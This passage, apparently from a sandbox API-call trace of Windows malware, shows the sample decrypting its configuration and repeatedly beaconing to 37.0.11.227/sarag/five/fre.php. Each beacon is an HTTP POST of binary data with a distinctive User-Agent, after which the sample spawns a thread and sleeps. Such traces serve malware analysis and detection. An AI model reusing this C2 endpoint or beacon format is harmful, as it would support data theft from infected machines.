Flags=0x0, Size=0x40) returned 0x6a4340 [0258.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.451] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0258.519] GetProcessHeap () returned 0x690000 [0258.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0258.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.521] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0258.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.522] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.524] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.524] GetProcessHeap () returned 0x690000 [0258.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0258.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.528] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0258.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.529] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0258.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.530] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0258.530] GetProcessHeap () returned 0x690000 [0258.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0258.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.532] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.532] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.533] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.534] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.535] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.535] GetProcessHeap () returned 0x690000 [0258.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0258.535] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0258.536] GetProcessHeap () returned 0x690000 [0258.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0258.539] GetProcessHeap () returned 0x690000 [0258.540] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0258.540] GetProcessHeap () returned 0x690000 [0258.540] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0258.540] GetProcessHeap () returned 0x690000 [0258.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0258.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.541] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.548] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0258.555] GetProcessHeap () returned 0x690000 [0258.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0258.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.557] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0258.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.560] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.562] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.562] GetProcessHeap () returned 0x690000 [0258.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0258.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.564] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0258.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.566] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0258.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.567] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0258.567] GetProcessHeap () returned 0x690000 [0258.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0258.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.573] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0258.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.574] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0258.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.575] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0258.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.576] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0258.576] GetProcessHeap () returned 0x690000 [0258.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0258.577] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0258.577] GetProcessHeap () returned 0x690000 [0258.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0258.577] socket (af=2, type=1, protocol=6) returned 0x76c [0258.577] connect (s=0x76c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0258.608] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0258.608] GetProcessHeap () returned 0x690000 [0258.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0258.608] GetProcessHeap () returned 0x690000 [0258.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0258.609] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0258.610] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0258.610] GetProcessHeap () returned 0x690000 [0258.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0258.610] GetProcessHeap () returned 0x690000 [0258.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0258.614] GetProcessHeap () returned 0x690000 [0258.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0258.614] GetProcessHeap () returned 0x690000 [0258.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0258.617] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0258.618] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0258.618] GetProcessHeap () returned 0x690000 [0258.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0258.618] GetProcessHeap () returned 0x690000 [0258.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0258.619] send (s=0x76c, buf=0x6ad508*, len=242, flags=0) returned 242 [0258.620] send (s=0x76c, buf=0x6aba40*, len=159, flags=0) returned 159 [0258.620] GetProcessHeap () returned 0x690000 [0258.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0258.620] recv (in: s=0x76c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0258.720] GetProcessHeap () returned 0x690000 [0258.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0258.720] GetProcessHeap () returned 0x690000 [0258.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0258.721] GetProcessHeap () returned 0x690000 [0258.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0258.721] GetProcessHeap () returned 0x690000 [0258.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0258.721] closesocket (s=0x76c) returned 0 [0258.722] GetProcessHeap () returned 0x690000 [0258.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0258.722] GetProcessHeap () returned 0x690000 [0258.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0258.722] GetProcessHeap () returned 0x690000 [0258.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0258.722] GetProcessHeap () returned 0x690000 [0258.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0258.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1510) returned 0x76c [0258.726] Sleep (dwMilliseconds=0xea60) [0258.728] GetProcessHeap () returned 0x690000 [0258.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0258.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.729] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.734] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0258.741] GetProcessHeap () returned 0x690000 [0258.741] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0258.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.742] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0258.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.743] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.744] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.744] GetProcessHeap () returned 0x690000 [0258.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0258.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.748] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0258.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.749] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0258.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.750] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0258.750] GetProcessHeap () returned 0x690000 [0258.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0258.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.751] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.752] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.753] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.754] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.754] GetProcessHeap () returned 0x690000 [0258.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0258.754] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0258.754] GetProcessHeap () returned 0x690000 [0258.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0258.755] GetProcessHeap () returned 0x690000 [0258.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0258.755] GetProcessHeap () returned 0x690000 [0258.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0258.756] GetProcessHeap () returned 0x690000 [0258.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0258.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.759] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.772] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0258.783] GetProcessHeap () returned 0x690000 [0258.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0258.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.784] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0258.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.786] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.787] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.787] GetProcessHeap () returned 0x690000 [0258.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0258.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.788] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0258.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.789] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0258.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.790] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0258.790] GetProcessHeap () returned 0x690000 [0258.790] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0258.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.791] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0258.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.792] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0258.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.793] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0258.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.794] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0258.794] GetProcessHeap () returned 0x690000 [0258.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0258.795] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0258.795] GetProcessHeap () returned 0x690000 [0258.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0258.795] socket (af=2, type=1, protocol=6) returned 0x770 [0258.795] connect (s=0x770, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0258.822] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0258.822] GetProcessHeap () returned 0x690000 [0258.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0258.822] GetProcessHeap () returned 0x690000 [0258.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0258.822] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0258.823] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0258.823] GetProcessHeap () returned 0x690000 [0258.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0258.824] GetProcessHeap () returned 0x690000 [0258.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0258.826] GetProcessHeap () returned 0x690000 [0258.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0258.826] GetProcessHeap () returned 0x690000 [0258.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0258.827] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0258.828] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0258.828] GetProcessHeap () returned 0x690000 [0258.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0258.828] GetProcessHeap () returned 0x690000 [0258.830] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0258.830] send (s=0x770, buf=0x6ad508*, len=242, flags=0) returned 242 [0258.830] send (s=0x770, buf=0x6aba40*, len=159, flags=0) returned 159 [0258.830] GetProcessHeap () returned 0x690000 [0258.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0258.831] recv (in: s=0x770, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0258.930] GetProcessHeap () returned 0x690000 [0258.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0258.931] GetProcessHeap () returned 0x690000 [0258.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0258.931] GetProcessHeap () returned 0x690000 [0258.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0258.931] GetProcessHeap () returned 0x690000 [0258.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0258.932] closesocket (s=0x770) returned 0 [0258.932] GetProcessHeap () returned 0x690000 [0258.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0258.932] GetProcessHeap () returned 0x690000 [0258.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0258.933] GetProcessHeap () returned 0x690000 [0258.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0258.933] GetProcessHeap () returned 0x690000 [0258.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0258.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1514) returned 0x770 [0258.947] Sleep (dwMilliseconds=0xea60) [0258.948] GetProcessHeap () returned 0x690000 [0258.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0258.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.949] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0258.960] GetProcessHeap () returned 0x690000 [0258.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0258.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.961] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0258.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.979] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.981] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.981] GetProcessHeap () returned 